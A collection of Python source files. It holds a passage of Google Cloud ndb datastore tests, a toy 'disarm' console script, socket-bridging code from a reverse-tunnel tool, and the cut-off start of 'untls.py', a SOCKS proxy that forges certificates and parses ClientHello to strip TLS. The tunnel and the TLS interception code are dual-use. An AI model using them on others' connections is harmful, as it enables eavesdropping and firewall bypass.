class SomeKind(ndb.Model):
foo = ndb.IntegerProperty()
bar = ndb.StringProperty()
def update_entity():
key = ndb.Key(KIND, entity_id)
entity = key.get()
entity.foo = 56
entity.bar = "high"
assert entity.put() == key
return key
key = ndb.transaction(update_entity)
retrieved = key.get()
assert retrieved.foo == 56
assert retrieved.bar == "high"
@pytest.mark.usefixtures("client_context")
def test_parallel_transactions():
def task(delay):
@ndb.tasklet
def callback():
transaction = ndb.get_context().transaction
yield ndb.sleep(delay)
assert ndb.get_context().transaction == transaction
raise ndb.Return(transaction)
return callback
future1 = ndb.transaction_async(task(0.1))
future2 = ndb.transaction_async(task(0.06))
ndb.wait_all((future1, future2))
assert future1.get_result() != future2.get_result()
@pytest.mark.usefixtures("client_context")
def test_delete_entity(ds_entity):
entity_id = test_utils.system.unique_resource_id()
ds_entity(KIND, entity_id, foo=42)
class SomeKind(ndb.Model):
foo = ndb.IntegerProperty()
key = ndb.Key(KIND, entity_id)
assert key.get().foo == 42
assert key.delete() is None
assert key.get() is None
assert key.delete() is None
def test_delete_entity_with_caching(ds_entity, client_context):
entity_id = test_utils.system.unique_resource_id()
ds_entity(KIND, entity_id, foo=42)
class SomeKind(ndb.Model):
foo = ndb.IntegerProperty()
client_context.set_cache_policy(None) # Use default
key = ndb.Key(KIND, entity_id)
assert key.get().foo == 42
assert key.delete() is None
assert key.get() is None
assert key.delete() is None
def test_delete_entity_with_global_cache(ds_entity, client_context):
entity_id = test_utils.system.unique_resource_id()
ds_entity(KIND, entity_id, foo=42)
class SomeKind(ndb.Model):
foo = ndb.IntegerProperty()
key = ndb.Key(KIND, entity_id)
cache_key = _cache.global_cache_key(key._key)
global_cache = global_cache_module._InProcessGlobalCache()
cache_dict = global_cache_module._InProcessGlobalCache.cache
with client_context.new(global_cache=global_cache).use():
assert key.get().foo == 42
assert cache_key in cache_dict
assert key.delete() is None
assert cache_key not in cache_dict
# This is py27 behavior. Not entirely sold on leaving _LOCKED value for
# Datastore misses.
assert key.get() is None
assert cache_dict[cache_key][0] == b"0"
@pytest.mark.skipif(not USE_REDIS_CACHE, reason="Redis is not configured")
def test_delete_entity_with_redis_cache(ds_entity, client_context):
entity_id = test_utils.system.unique_resource_id()
ds_entity(KIND, entity_id, foo=42)
class SomeKind(ndb.Model):
foo = ndb.IntegerProperty()
key = ndb.Key(KIND, entity_id)
cache_key = _cache.global_cache_key(key._key)
global_cache = global_cache_module.RedisCache.from_environment()
with client_context.new(global_cache=global_cache).use():
assert key.get().foo == 42
assert global_cache.redis.get(cache_key) is not None
assert key.delete() is None
assert global_cache.redis.get(cache_key) is None
# This is py27 behavior. Not entirely sold on leaving _LOCKED value for
# Datastore misses.
assert key.get() is None
assert global_cache.redis.get(cache_key) == b"0"
@pytest.mark.usefixtures("client_context")
def test_delete_entity_in_transaction(ds_entity):
entity_id = test_utils.system.unique_resource_id()
ds_entity(KIND, entity_id, foo=42)
class SomeKind(ndb.Model):
foo = ndb.IntegerProperty()
key = ndb.Key(KIND, entity_id)
assert key.get().foo == 42
def delete_entity():
assert key.delete() is None
assert key.get().foo == 42 # not deleted until commit
ndb.transaction(delete_entity)
assert key.get() is None
@pytest.mark.usefixtures("client_context")
def test_delete_entity_in_transaction_then_rollback(ds_entity):
entity_id = test_utils.system.unique_resource_id()
ds_entity(KIND, entity_id, foo=42)
class SomeKind(ndb.Model):
foo = ndb.IntegerProperty()
key = ndb.Key(KIND, entity_id)
assert key.get().foo == 42
def delete_entity():
assert key.delete() is None
raise Exception("Spurious error")
with pytest.raises(Exception):
ndb.transaction(delete_entity)
assert key.get().foo == 42
@pytest.mark.usefixtures("client_context")
def test_allocate_ids():
class SomeKind(ndb.Model):
pass
keys = SomeKind.allocate_ids(5)
assert len(keys) == 5
for key in keys:
assert key.id()
assert key.get() is None
@pytest.mark.usefixtures("client_context")
def test_get_by_id(ds_entity):
class SomeKind(ndb.Model):
foo = ndb.IntegerProperty()
entity_id = test_utils.system.unique_resource_id()
ds_entity(KIND, entity_id, foo=42)
key = ndb.Key(KIND, entity_id)
assert key.get().foo == 42
entity = SomeKind.get_by_id(entity_id)
assert entity.foo == 42
@pytest.mark.usefixtures("client_context")
def test_get_or_insert_get(ds_entity):
class SomeKind(ndb.Model):
foo = ndb.IntegerProperty()
name = "Inigo Montoya"
assert SomeKind.get_by_id(name) is None
ds_entity(KIND, name, foo=42)
entity = SomeKind.get_or_insert(name, foo=21)
assert entity.foo == 42
@pytest.mark.usefixtures("client_context")
def test_get_or_insert_insert(dispose_of):
class SomeKind(ndb.Model):
foo = ndb.IntegerProperty()
name = "Inigo Montoya"
assert SomeKind.get_by_id(name) is None
entity = SomeKind.get_or_insert(name, foo=21)
dispose_of(entity._key._key)
assert entity.foo == 21
@pytest.mark.usefixtures("client_context")
def test_get_or_insert_get_in_transaction(ds_entity):
class SomeKind(ndb.Model):
foo = ndb.IntegerProperty()
name = "Inigo Montoya"
assert SomeKind.get_by_id(name) is None
def do_the_thing():
ds_entity(KIND, name, foo=42)
return SomeKind.get_or_insert(name, foo=21)
entity = ndb.transaction(do_the_thing)
assert entity.foo == 42
@pytest.mark.usefixtures("client_context")
def test_insert_entity_with_structured_property(dispose_of):
class OtherKind(ndb.Model):
one = ndb.StringProperty()
two = ndb.StringProperty()
class SomeKind(ndb.Model):
foo = ndb.IntegerProperty()
bar = ndb.StructuredProperty(OtherKind)
entity = SomeKind(foo=42, bar=OtherKind(one="hi", two="mom"))
key = entity.put()
dispose_of(key._key)
retrieved = key.get()
assert retrieved.foo == 42
assert retrieved.bar.one == "hi"
assert retrieved.bar.two == "mom"
assert isinstance(retrieved.bar, OtherKind)
def test_insert_entity_with_structured_property_legacy_data(
client_context, dispose_of, ds_client
):
class OtherKind(ndb.Model):
one = ndb.StringProperty()
two = ndb.StringProperty()
class SomeKind(ndb.Model):
foo = ndb.IntegerProperty()
bar = ndb.StructuredProperty(OtherKind)
with client_context.new(legacy_data=True).use():
entity = SomeKind(foo=42, bar=OtherKind(one="hi", two="mom"))
key = entity.put()
dispose_of(key._key)
retrieved = key.get()
assert retrieved.foo == 42
assert retrieved.bar.one == "hi"
assert retrieved.bar.two == "mom"
assert isinstance(retrieved.bar, OtherKind)
ds_entity = ds_client.get(key._key)
assert ds_entity["foo"] == 42
assert ds_entity["bar.one"] == "hi"
assert ds_entity["bar.two"] == "mom"
@pytest.mark.usefixtures("client_context")
def test_retrieve_entity_with_legacy_structured_property(ds_entity):
class OtherKind(ndb.Model):
one = ndb.StringProperty()
two = ndb.StringProperty()
class SomeKind(ndb.Model):
foo = ndb.IntegerProperty()
bar = ndb.StructuredProperty(OtherKind)
entity_id = test_utils.system.unique_resource_id()
ds_entity(
KIND, entity_id, **{"foo": 42, "bar.one": "hi", "bar.two": "mom"}
)
key = ndb.Key(KIND, entity_id)
retrieved = key.get()
assert retrieved.foo == 42
assert retrieved.bar.one == "hi"
assert retrieved.bar.two == "mom"
assert isinstance(retrieved.bar, OtherKind)
@pytest.mark.usefixtures("client_context")
def test_retrieve_entity_with_legacy_repeated_structured_property(ds_entity):
class OtherKind(ndb.Model):
one = ndb.StringProperty()
two = ndb.StringProperty()
class SomeKind(ndb.Model):
foo = ndb.IntegerProperty()
bar = ndb.StructuredProperty(OtherKind, repeated=True)
entity_id = test_utils.system.unique_resource_id()
ds_entity(
KIND,
entity_id,
**{"foo": 42, "bar.one": ["hi", "hello"], "bar.two": ["mom", "dad"]}
)
key = ndb.Key(KIND, entity_id)
retrieved = key.get()
assert retrieved.foo == 42
assert retrieved.bar[0].one == "hi"
assert retrieved.bar[0].two == "mom"
assert retrieved.bar[1].one == "hello"
assert retrieved.bar[1].two == "dad"
assert isinstance(retrieved.bar[0], OtherKind)
assert isinstance(retrieved.bar[1], OtherKind)
@pytest.mark.usefixtures("client_context")
def test_insert_expando(dispose_of):
class SomeKind(ndb.Expando):
foo = ndb.IntegerProperty()
entity = SomeKind(foo=42)
entity.expando_prop = "exp-value"
key = entity.put()
dispose_of(key._key)
retrieved = key.get()
assert retrieved.foo == 42
assert retrieved.expando_prop == "exp-value"
@pytest.mark.usefixtures("client_context")
def test_insert_polymodel(dispose_of):
class Animal(ndb.PolyModel):
one = ndb.StringProperty()
class Feline(Animal):
two = ndb.StringProperty()
class Cat(Feline):
three = ndb.StringProperty()
entity = Cat(one="hello", two="dad", three="i'm in jail")
key = entity.put()
dispose_of(key._key)
retrieved = key.get()
assert isinstance(retrieved, Animal)
assert isinstance(retrieved, Cat)
assert retrieved.one == "hello"
assert retrieved.two == "dad"
assert retrieved.three == "i'm in jail"
@pytest.mark.usefixtures("client_context")
def test_insert_autonow_property(dispose_of):
class SomeKind(ndb.Model):
foo = ndb.StringProperty()
created_at = ndb.DateTimeProperty(indexed=True, auto_now_add=True)
updated_at = ndb.DateTimeProperty(indexed=True, auto_now=True)
entity = SomeKind(foo="bar")
key = entity.put()
dispose_of(key._key)
retrieved = key.get()
assert isinstance(retrieved.created_at, datetime.datetime)
assert isinstance(retrieved.updated_at, datetime.datetime)
@pytest.mark.usefixtures("client_context")
def test_insert_nested_autonow_property(dispose_of):
class OtherKind(ndb.Model):
created_at = ndb.DateTimeProperty(indexed=True, auto_now_add=True)
updated_at = ndb.DateTimeProperty(indexed=True, auto_now=True)
class SomeKind(ndb.Model):
other = ndb.StructuredProperty(OtherKind)
entity = SomeKind(other=OtherKind())
key = entity.put()
dispose_of(key._key)
retrieved = key.get()
assert isinstance(retrieved.other.created_at, datetime.datetime)
assert isinstance(retrieved.other.updated_at, datetime.datetime)
@pytest.mark.usefixtures("client_context")
def test_uninitialized_property(dispose_of):
class SomeKind(ndb.Model):
foo = ndb.StringProperty(required=True)
entity = SomeKind()
with pytest.raises(ndb.exceptions.BadValueError):
entity.put()
@mock.patch(
"google.cloud.ndb._datastore_api.make_call",
mock.Mock(side_effect=Exception("Datastore shouldn't get called.")),
)
def test_crud_without_datastore(ds_entity, client_context):
entity_id = test_utils.system.unique_resource_id()
class SomeKind(ndb.Model):
foo = ndb.IntegerProperty()
bar = ndb.StringProperty()
baz = ndb.StringProperty()
global_cache = global_cache_module._InProcessGlobalCache()
with client_context.new(global_cache=global_cache).use() as context:
context.set_global_cache_policy(None) # Use default
context.set_datastore_policy(False) # Don't use Datastore
key = ndb.Key(KIND, entity_id)
SomeKind(foo=42, bar="none", baz="night", _key=key).put()
entity = key.get()
assert isinstance(entity, SomeKind)
assert entity.foo == 42
assert entity.bar == "none"
assert entity.baz == "night"
key.delete()
assert key.get() is None
|
thread_ex.py
|
import threading
import time
import sys
def background():
while True:
time.sleep(3)
print ('disarm me by typing disarm')
def other_function():
print ('You disarmed me! Dying now.')
# now threading1 runs regardless of user input
threading1 = threading.Thread(target=background)
threading1.daemon = True
threading1.start()
while True:
if input() == 'disarm':
other_function()
sys.exit()
else:
print ('not disarmed')
|
common_func.py
|
#!/usr/bin/env python
# coding=utf-8
from __future__ import print_function, unicode_literals, division, absolute_import
import sys
import time
import binascii
import struct
import collections
import logging
import socket
import functools
import threading
import traceback
import warnings
try:
import selectors
from selectors import EVENT_READ, EVENT_WRITE
EVENT_READ_WRITE = EVENT_READ | EVENT_WRITE
except ImportError:
import select
warnings.warn('selectors module not available, fallback to select')
selectors = None
try:
import ssl
except ImportError:
ssl = None
warnings.warn('ssl module not available, ssl feature is disabled')
try:
# for pycharm type hinting
from typing import Union, Callable
except:
pass
# socket recv buffer, 16384 bytes
RECV_BUFFER_SIZE = 2 ** 14
# default secretkey, use -k/--secretkey to change
SECRET_KEY = None # "shootback"
# how long a SPARE slaver would keep
# once slaver received an heart-beat package from master,
# the TTL would be reset. And heart-beat delay is less than TTL,
# so, theoretically, spare slaver never timeout,
# except network failure
# notice: working slaver would NEVER timeout
SPARE_SLAVER_TTL = 300
# internal program version, appears in CtrlPkg
INTERNAL_VERSION = 0x0013
# # how many packet are buffed, before delaying recv
# SOCKET_BRIDGE_SEND_BUFF_SIZE = 5
# version for human readable
__version__ = (2, 6, 1, INTERNAL_VERSION)
# just a logger
log = logging.getLogger(__name__)
def version_info():
"""get program version for human. eg: "2.1.0-r2" """
return "{}.{}.{}-r{}".format(*__version__)
def configure_logging(level):
logging.basicConfig(
level=level,
format='[%(levelname)s %(asctime)s] %(message)s',
)
def fmt_addr(socket):
"""(host, int(port)) --> "host:port" """
return "{}:{}".format(*socket)
def split_host(x):
""" "host:port" --> (host, int(port))"""
try:
host, port = x.split(":")
port = int(port)
except:
raise ValueError(
"wrong syntax, format host:port is "
"required, not {}".format(x))
else:
return host, port
def try_close(closable):
"""try close something
same as
try:
connection.close()
except:
pass
"""
try:
closable.close()
except:
pass
def select_recv(conn, buff_size, timeout=None):
"""add timeout for socket.recv()
:type conn: socket.socket
:type buff_size: int
:type timeout: float
:rtype: Union[bytes, None]
"""
if selectors:
sel = selectors.DefaultSelector()
sel.register(conn, EVENT_READ)
events = sel.select(timeout)
sel.close()
if not events:
# timeout
raise RuntimeError("recv timeout")
else:
rlist, _, _ = select.select([conn], [], [], timeout)
buff = conn.recv(buff_size)
if not buff:
raise RuntimeError("received zero bytes, socket was closed")
return buff
def set_secretkey(key):
global SECRET_KEY
SECRET_KEY = key
CtrlPkg.recalc_crc32()
class SocketBridge(object):
"""
transfer data between sockets
"""
def __init__(self):
self.conn_rd = set() # record readable-sockets
self.conn_wr = set() # record writeable-sockets
self.map = {} # record sockets pairs
self.callbacks = {} # record callbacks
self.send_buff = {} # buff one packet for those sending too-fast socket
if selectors:
self.sel = selectors.DefaultSelector()
else:
self.sel = None
def add_conn_pair(self, conn1, conn2, callback=None):
"""
transfer anything between two sockets
:type conn1: socket.socket
:type conn2: socket.socket
:param callback: callback in connection finish
:type callback: Callable
"""
# change to non-blocking
# we use select or epoll to notice when data is ready
conn1.setblocking(False)
conn2.setblocking(False)
# mark as readable+writable
self.conn_rd.add(conn1)
self.conn_wr.add(conn1)
self.conn_rd.add(conn2)
self.conn_wr.add(conn2)
# record sockets pairs
self.map[conn1] = conn2
self.map[conn2] = conn1
# record callback
if callback is not None:
self.callbacks[conn1] = callback
if self.sel:
self.sel.register(conn1, EVENT_READ_WRITE)
self.sel.register(conn2, EVENT_READ_WRITE)
def start_as_daemon(self):
t = threading.Thread(target=self.start)
t.daemon = True
t.start()
log.info("SocketBridge daemon started")
return t
def start(self):
while True:
try:
self._start()
except:
log.error("FATAL ERROR! SocketBridge failed {}".format(
traceback.format_exc()
))
def _start(self):
while True:
if not self.conn_rd and not self.conn_wr:
# sleep if there is no connections
time.sleep(0.01)
continue
# blocks until there is socket(s) ready for .recv
# notice: sockets which were closed by remote,
# are also regarded as read-ready by select()
if self.sel:
events = self.sel.select(0.5)
socks_rd = tuple(key.fileobj for key, mask in events if mask & EVENT_READ)
socks_wr = tuple(key.fileobj for key, mask in events if mask & EVENT_WRITE)
else:
r, w, _ = select.select(self.conn_rd, self.conn_wr, [], 0.5)
socks_rd = tuple(r)
socks_wr = tuple(w)
# log.debug('socks_rd: %s, socks_wr:%s', len(socks_rd), len(socks_wr))
if not socks_rd and not self.send_buff: # reduce CPU in low traffic
time.sleep(0.005)
# log.debug('got rd:%s wr:%s', socks_rd, socks_wr)
# ----------------- RECEIVING ----------------
# For prevent high CPU at slow network environment, we record if there is any
# success network operation, if we did nothing in single loop, we'll sleep a while.
_stuck_network = True
for s in socks_rd: # type: socket.socket
# if this socket has non-sent data, stop recving more, to prevent buff blowing up.
if self.map[s] in self.send_buff:
# log.debug('delay recv because another too slow %s', self.map.get(s))
continue
_stuck_network = False
try:
received = s.recv(RECV_BUFFER_SIZE)
# log.debug('recved %s from %s', len(received), s)
except Exception as e:
# ssl may raise SSLWantReadError or SSLWantWriteError
# just continue and wait it complete
if ssl and isinstance(e, (ssl.SSLWantReadError, ssl.SSLWantWriteError)):
# log.warning('got %s, wait to read then', repr(e))
continue
# unable to read, in most cases, it's due to socket close
log.warning('error reading socket %s, %s closing', repr(e), s)
self._rd_shutdown(s)
continue
if not received:
self._rd_shutdown(s)
continue
else:
self.send_buff[self.map[s]] = received
# ----------------- SENDING ----------------
for s in socks_wr:
if s not in self.send_buff:
if self.map.get(s) not in self.conn_rd:
self._wr_shutdown(s)
continue
_stuck_network = False
data = self.send_buff.pop(s)
try:
s.send(data)
# log.debug('sent %s to %s', len(data), s)
except Exception as e:
if ssl and isinstance(e, (ssl.SSLWantReadError, ssl.SSLWantWriteError)):
# log.warning('got %s, wait to write then', repr(e))
self.send_buff[s] = data # write back for next write
continue
# unable to send, close connection
log.warning('error sending socket %s, %s closing', repr(e), s)
self._wr_shutdown(s)
continue
if _stuck_network: # slower at bad network
time.sleep(0.001)
def _sel_disable_event(self, conn, ev):
try:
_key = self.sel.get_key(conn) # type:selectors.SelectorKey
except KeyError:
pass
else:
if _key.events == EVENT_READ_WRITE:
self.sel.modify(conn, EVENT_READ_WRITE ^ ev)
else:
self.sel.unregister(conn)
def _rd_shutdown(self, conn, once=False):
"""action when connection should be read-shutdown
:type conn: socket.socket
"""
if conn in self.conn_rd:
self.conn_rd.remove(conn)
if self.sel:
self._sel_disable_event(conn, EVENT_READ)
# if conn in self.send_buff:
# del self.send_buff[conn]
try:
conn.shutdown(socket.SHUT_RD)
except:
pass
if not once and conn in self.map: # use the `once` param to avoid infinite loop
# if a socket is rd_shutdowned, then it's
# pair should be wr_shutdown.
self._wr_shutdown(self.map[conn], True)
if self.map.get(conn) not in self.conn_rd:
# if both two connection pair was rd-shutdowned,
# this pair sockets are regarded to be completed
# so we gonna close them
self._terminate(conn)
def _wr_shutdown(self, conn, once=False):
"""action when connection should be write-shutdown
:type conn: socket.socket
"""
try:
conn.shutdown(socket.SHUT_WR)
except:
pass
if conn in self.conn_wr:
self.conn_wr.remove(conn)
if self.sel:
self._sel_disable_event(conn, EVENT_WRITE)
if not once and conn in self.map: # use the `once` param to avoid infinite loop
# pair should be rd_shutdown.
# if a socket is wr_shutdowned, then it's
self._rd_shutdown(self.map[conn], True)
def _terminate(self, conn, once=False):
"""terminate a sockets pair (two socket)
:type conn: socket.socket
:param conn: any one of the sockets pair
"""
try_close(conn) # close the first socket
# ------ close and clean the mapped socket, if exist ------
_another_conn = self.map.pop(conn, None)
self.send_buff.pop(conn, None)
if self.sel:
try:
self.sel.unregister(conn)
except:
pass
# ------ callback --------
# because we are not sure which socket are assigned to callback,
# so we should try both
if conn in self.callbacks:
try:
self.callbacks[conn]()
except Exception as e:
log.error("traceback error: {}".format(e))
log.debug(traceback.format_exc())
del self.callbacks[conn]
# terminate another
if not once and _another_conn in self.map:
self._terminate(_another_conn)
class CtrlPkg(object):
"""
Control Packages of shootback, not completed yet
current we have: handshake and heartbeat
NOTICE: If you are non-Chinese reader,
please contact me for the following Chinese comment's translation
http://github.com/aploium
控制包结构 总长64bytes CtrlPkg.FORMAT_PKG
使用 big-endian
体积 名称 数据类型 描述
1 pkg_ver unsigned char 包版本 *1
1 pkg_type signed char 包类型 *2
2 prgm_ver unsigned short 程序版本 *3
20 N/A N/A 预留
40 data bytes 数据区 *4
*1: 包版本. 包整体结构的定义版本, 目前只有 0x01
*2: 包类型. 除心跳外, 所有负数包代表由Slaver发出, 正数包由Master发出
-1: Slaver-->Master 的握手响应包 PTYPE_HS_S2M
0: 心跳包 PTYPE_HEART_BEAT
+1: Master-->Slaver 的握手包 PTYPE_HS_M2S
*3: 默认即为 INTERNAL_VERSION
*4: 数据区中的内容由各个类型的包自身定义
-------------- 数据区定义 ------------------
包类型: -1 (Slaver-->Master 的握手响应包)
体积 名称 数据类型 描述
4 crc32_s2m unsigned int 简单鉴权用 CRC32(Reversed(SECRET_KEY))
1 ssl_flag unsigned char 是否支持SSL
其余为空
*注意: -1握手包是把 SECRET_KEY 字符串翻转后取CRC32, +1握手包不预先反转
包类型: 0 (心跳)
数据区为空
包理性: +1 (Master-->Slaver 的握手包)
体积 名称 数据类型 描述
4 crc32_m2s unsigned int 简单鉴权用 CRC32(SECRET_KEY)
1 ssl_flag unsigned char 是否支持SSL
其余为空
"""
PACKAGE_SIZE = 2 ** 6 # 64 bytes
CTRL_PKG_TIMEOUT = 5 # CtrlPkg recv timeout, in second
# CRC32 for SECRET_KEY and Reversed(SECRET_KEY)
# these values are set by `set_secretkey`
SECRET_KEY_CRC32 = None # binascii.crc32(SECRET_KEY.encode('utf-8')) & 0xffffffff
SECRET_KEY_REVERSED_CRC32 = None # binascii.crc32(SECRET_KEY[::-1].encode('utf-8')) & 0xffffffff
# Package Type
PTYPE_HS_S2M = -1 # handshake pkg, slaver to master
PTYPE_HEART_BEAT = 0 # heart beat pkg
PTYPE_HS_M2S = +1 # handshake pkg, Master to Slaver
TYPE_NAME_MAP = {
PTYPE_HS_S2M: "PTYPE_HS_S2M",
PTYPE_HEART_BEAT: "PTYPE_HEART_BEAT",
PTYPE_HS_M2S: "PTYPE_HS_M2S",
}
# formats
# see https://docs.python.org/3/library/struct.html#format-characters
# for format syntax
FORMAT_PKG = b"!b b H 20x 40s"
FORMATS_DATA = {
PTYPE_HS_S2M: b"!I B 35x",
PTYPE_HEART_BEAT: b"!40x",
PTYPE_HS_M2S: b"!I B 35x",
}
SSL_FLAG_NONE = 0
SSL_FLAG_AVAIL = 1
def __init__(self, pkg_ver=0x01, pkg_type=0,
prgm_ver=INTERNAL_VERSION, data=(),
raw=None,
):
"""do not call this directly, use `CtrlPkg.pbuild_*` instead"""
self.pkg_ver = pkg_ver
self.pkg_type = pkg_type
self.prgm_ver = prgm_ver
self.data = data
if raw:
self.raw = raw
else:
self._build_bytes()
@property
def type_name(self):
"""返回人类可读的包类型"""
return self.TYPE_NAME_MAP.get(self.pkg_type, "TypeUnknown")
def __str__(self):
return """pkg_ver: {} pkg_type:{} prgm_ver:{} data:{}""".format(
self.pkg_ver,
self.type_name,
self.prgm_ver,
self.data,
)
def __repr__(self):
return self.__str__()
def _build_bytes(self):
self.raw = struct.pack(
self.FORMAT_PKG,
self.pkg_ver,
self.pkg_type,
self.prgm_ver,
self.data_encode(self.pkg_type, self.data),
)
@classmethod
def recalc_crc32(cls):
cls.SECRET_KEY_CRC32 = binascii.crc32(SECRET_KEY.encode('utf-8')) & 0xffffffff
cls.SECRET_KEY_REVERSED_CRC32 = binascii.crc32(SECRET_KEY[::-1].encode('utf-8')) & 0xffffffff
@classmethod
def data_decode(cls, ptype, data_raw):
return struct.unpack(cls.FORMATS_DATA[ptype], data_raw)
@classmethod
def data_encode(cls, ptype, data):
return struct.pack(cls.FORMATS_DATA[ptype], *data)
def verify(self, pkg_type=None):
try:
if pkg_type is not None and self.pkg_type != pkg_type:
return False
elif self.pkg_type == self.PTYPE_HS_S2M:
# Slaver-->Master 的握手响应包
return self.data[0] == self.SECRET_KEY_REVERSED_CRC32
elif self.pkg_type == self.PTYPE_HEART_BEAT:
# 心跳
return True
elif self.pkg_type == self.PTYPE_HS_M2S:
# Master-->Slaver 的握手包
return self.data[0] == self.SECRET_KEY_CRC32
else:
return True
except:
return False
@classmethod
def decode_only(cls, raw):
"""
decode raw bytes to CtrlPkg instance, no verify
use .decode_verify() if you also want verify
:param raw: raw bytes content of package
:type raw: bytes
:rtype: CtrlPkg
"""
if not raw or len(raw) != cls.PACKAGE_SIZE:
raise ValueError("content size should be {}, but {}".format(
cls.PACKAGE_SIZE, len(raw)
))
pkg_ver, pkg_type, prgm_ver, data_raw = struct.unpack(cls.FORMAT_PKG, raw)
data = cls.data_decode(pkg_type, data_raw)
return cls(
pkg_ver=pkg_ver, pkg_type=pkg_type,
prgm_ver=prgm_ver,
data=data,
raw=raw,
)
@classmethod
def decode_verify(cls, raw, pkg_type=None):
"""decode and verify a package
:param raw: raw bytes content of package
:type raw: bytes
:param pkg_type: assert this package's type,
if type not match, would be marked as wrong
:type pkg_type: int
:rtype: CtrlPkg, bool
:return: tuple(CtrlPkg, is_it_a_valid_package)
"""
try:
pkg = cls.decode_only(raw)
except:
log.error('unable to decode package. raw: %s', raw, exc_info=True)
return None, False
else:
return pkg, pkg.verify(pkg_type=pkg_type)
@classmethod
def pbuild_hs_m2s(cls, ssl_avail=False):
"""pkg build: Handshake Master to Slaver
"""
ssl_flag = cls.SSL_FLAG_AVAIL if ssl_avail else cls.SSL_FLAG_NONE
return cls(
pkg_type=cls.PTYPE_HS_M2S,
data=(cls.SECRET_KEY_CRC32, ssl_flag),
)
@classmethod
def pbuild_hs_s2m(cls, ssl_avail=False):
"""pkg build: Handshake Slaver to Master"""
ssl_flag = cls.SSL_FLAG_AVAIL if ssl_avail else cls.SSL_FLAG_NONE
return cls(
pkg_type=cls.PTYPE_HS_S2M,
data=(cls.SECRET_KEY_REVERSED_CRC32, ssl_flag),
)
@classmethod
def pbuild_heart_beat(cls):
"""pkg build: Heart Beat Package"""
return cls(
pkg_type=cls.PTYPE_HEART_BEAT,
)
@classmethod
def recv(cls, sock, timeout=CTRL_PKG_TIMEOUT, expect_ptype=None):
"""just a shortcut function
:param sock: which socket to recv CtrlPkg from
:type sock: socket.socket
:rtype: CtrlPkg,bool
"""
buff = select_recv(sock, cls.PACKAGE_SIZE, timeout)
pkg, verify = CtrlPkg.decode_verify(buff, pkg_type=expect_ptype) # type: CtrlPkg,bool
return pkg, verify
|
untls.py
|
#!/usr/bin/env python3
import logging
import argparse
import socket, struct, random
import ssl, threading, socks, ctypes
from socksproxy import SocksProxy, ThreadingTCPServer, pipe_sockets, str2ipport, setprocname
from tempfile import TemporaryFile
from OpenSSL import crypto
from contextlib import contextmanager
from socketserver import ThreadingMixIn, TCPServer
def readfile(file):
with open(file,"rt") as f:
return f.read()
class Cert:
def __init__(self, cert, key):
self.ref = 1
self.cert = cert
self.key = key
with TemporaryFile(mode='w+b') as chain_file:
chain_file.write(crypto.dump_privatekey(crypto.FILETYPE_PEM, key))
chain_file.write(crypto.dump_certificate(crypto.FILETYPE_PEM, cert))
chain_file.flush()
chain_fd_path = '/proc/self/fd/'+str(chain_file.fileno())
context = ssl.SSLContext(ssl.PROTOCOL_TLS_SERVER)
context.load_verify_locations(CA.ca_cert_path);
context.load_cert_chain(chain_fd_path)
self.context = context
class CertGen:
def __init__(self, ca_cert, ca_key):
self.certs = {}
self.ca_cert_path = ca_cert
self.ca_cert = crypto.load_certificate(crypto.FILETYPE_PEM, readfile(ca_cert))
self.ca_key = crypto.load_privatekey(crypto.FILETYPE_PEM, readfile(ca_key))
@contextmanager
def get(self, name):
try:
ex = self.certs.get(name)
if ex:
ex.ref += 1
yield ex
else:
key = crypto.PKey()
key.generate_key(crypto.TYPE_RSA, 2048)
cert = crypto.X509()
cert.set_version(2)
cert.set_serial_number(random.randint(50000000,100000000))
cert.get_subject().commonName = name
cert.add_extensions([
crypto.X509Extension(b"basicConstraints", False, b"CA:FALSE"),
crypto.X509Extension(b"subjectKeyIdentifier", False, b"hash", subject=cert),
])
cert.add_extensions([
crypto.X509Extension(b"authorityKeyIdentifier", False, b"keyid:always", issuer=self.ca_cert),
crypto.X509Extension(b"extendedKeyUsage", False, b"serverAuth"),
crypto.X509Extension(b"keyUsage", False, b"digitalSignature"),
])
cert.set_issuer(self.ca_cert.get_subject())
cert.set_pubkey(key)
cert.gmtime_adj_notBefore(-24*60*60)
cert.gmtime_adj_notAfter(7*24*60*60)
cert.sign(self.ca_key, 'sha256')
c = Cert(cert, key)
self.certs[name] = c
yield c
finally:
ex = self.certs[name]
ex.ref -= 1
# TODO: Add the below to a timer, and add an expiry date check
#if ex.ref <= 0:
# del self.certs[name]
def kill_thread(thread):
thread_id = thread.ident
res = ctypes.pythonapi.PyThreadState_SetAsyncExc(thread_id, ctypes.py_object(SystemExit))
if res > 1:
ctypes.pythonapi.PyThreadState_SetAsyncExc(thread_id, 0)
logging.error('Exception raise failure')
class TLSStripper(SocksProxy):
data = b''
def crecv(self, l):
assert len(self.data) + l < 1024 * 10 # Arbitrary limit, if we have to read more than 10K, something's probably off
res = self.connection.recv(l)
self.data += res
return res
def remote_connect(self):
self.sdirect = None
logging.info(f'{self.id}: Connecting to remote {self.remote_address} :{self.remote_port}')
# Note: This is for non-mitm-ed / direct connections. We do this early, so we can refuse connections early too.
s = self.mksocket(args.via)
self.rconnect(s, args.via)
self.sdirect = s
def handle_socks(self):
logging.info(f'{self.id}: Socks5 connection established')
try:
# TLSPlaintext
ptype = ord(self.crecv(1))
assert ptype == 22 # TLSPlaintext::type == ContentType::handshake
struct.unpack("!H", self.crecv(2)) # TLSPlaintext::legacy_record_version. Per spec: field is deprecated and MUST be ignored for all purposes
plength, = struct.unpack("!H", self.crecv(2)) # TLSPlaintext::length. Only includes following bytes.
assert plength <= 2**24 # Per spec: The length MUST NOT exceed 2^14 bytes.
assert plength >= 54 # Impossible to be shorter
# Handshake
htype = ord(self.crecv(1))
assert htype == 1 # Handshake::type == HandshakeType::client_hello
hlength, = struct.unpack("!I", b'\0' + self.crecv(3)) # Handshake::length, remaining bytes in message
assert hlength <= plength-4 # Handshake::type and Handshake::length are 4 bytes, so Handshake data must be at least 4 bytes smaller than fragment data
assert hlength >= 50 # Impossible to be shorter
# ClientHello
vversion, = struct.unpack("!H", self.crecv(2))
assert vversion == 0x0303 # ClientHello::version == TLS v1.2. Should also cover newer versions, since this field was deprecated for better backwards compat
self.crecv(32) # ClientHello::random
sid_len = ord(self.crecv(1))
assert sid_len <= 32
hlength -= 35 + sid_len + 2
assert hlength >= 13 # Impossible to be shorter
if sid_len:
self.crecv(sid_len)
vsciphersuite_len, = struct.unpack("!H", self.crecv(2))
hlength -= vsciphersuite_len + 1
assert hlength >= 12 # Impossible to be shorter
if vsciphersuite_len:
self.crecv(vsciphersuite_len)
vcompression_method_len = ord(self.crecv(1))
hlength -= vcompression_method_len + 2
assert hlength >= 10 # Impossible to be shorter
if vcompression_method_len:
